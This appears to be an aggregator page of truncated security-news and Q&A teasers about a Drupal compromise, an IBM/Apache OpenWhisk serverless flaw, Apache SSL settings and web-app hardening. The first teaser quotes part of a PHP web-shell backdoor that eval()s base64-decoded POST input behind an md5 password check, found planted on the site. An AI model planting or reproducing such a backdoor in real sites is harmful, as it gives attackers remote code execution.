Collaborate Disseminate
I found this suspicious file uploaded in my drupal site at sites/default/files/stats.php. The content is:
<?php /*7599*/
if(md5($_POST[“pf”]) === “93ad003d7fc57aae938ba483a65ddf6d”) {
eval(base64_decode($_POST[“cookies_… Continue reading PHP/Drupal site hack attempt [on hold]
Edgy XSS bypass, hacking fitness tracking in China, Russian hackers love power, leaky backups, Google hates Phishing for Google employees, Apache Tomcat, Solaris vulnerabilities that weren’t really fixed, OpenWhisk fails to beat a vulnerability. … Continue reading Russian Hackers, OpenWhisk, and Tomcat – Hack Naked News #182
Edgy XSS bypass, hacking fitness tracking in China, Russian hackers love power, leaky backups, Google hates Phishing for Google employees, Apache Tomcat, Solaris vulnerabilities that weren’t really fixed, OpenWhisk fails to beat a vulnerability. … Continue reading Russian Hackers, OpenWhisk, and Tomcat – Hack Naked News #182
The flaw opened a hole in IBM’s serverless Cloud Functions platform, potentially exposing confidential customer data. Continue reading Apache, IBM Patch Critical Cloud Vulnerability
Edgy XSS bypass, hacking fitness tracking in China, Russian hackers love power, leaky backups, Google hates Phishing for Google employees, Apache Tomcat, Solaris vulnerabilities that weren’t really fixed, OpenWhisk fails to beat a vulnerability. … Continue reading Russian Hackers, OpenWhisk, and Tomcat – Hack Naked News #182
By Waqas
This is the first publicly-disclosed vulnerability in a serverless platform. Experts at IBM (The International Business Machines Corporation) have patched a critical vulnerability in its Cloud Functions which if exploited could allow remote ma… Continue reading IBM fixes flaw that let hackers replace its serverless code with their own
On reading the documentation Apache documentation. A cipher suite example has been given :
RC4-SHA:AES128-SHA:HIGH:MEDIUM:!aNULL:!MD5
I have understood the explanation given by them. My question is whether it decides the … Continue reading Understanding SSL Cipher suite in Apache
I have an application that is using Apache. I have install the mod_ssl module for Apache, configured an SSL certificate and because the application provides such function configured http to https redirects but the server stil… Continue reading apache http https redirect server still listenting on port 80
How can I securely email myself the results of a form on my website?
Once a Contact Us form is submitted, a server script sanitizes the form response (as much as possible). Then:
Approach 1- The server (httpd) emails me th… Continue reading Website Form: Email as httpd or as a separate low-priv user?
I have several web applications running on my server (Debian 8 running Apache). One of my customers wants to improve the security of his app, after having some security audits carried out by a third-party company he showed me… Continue reading X-Frame-Options header on redirect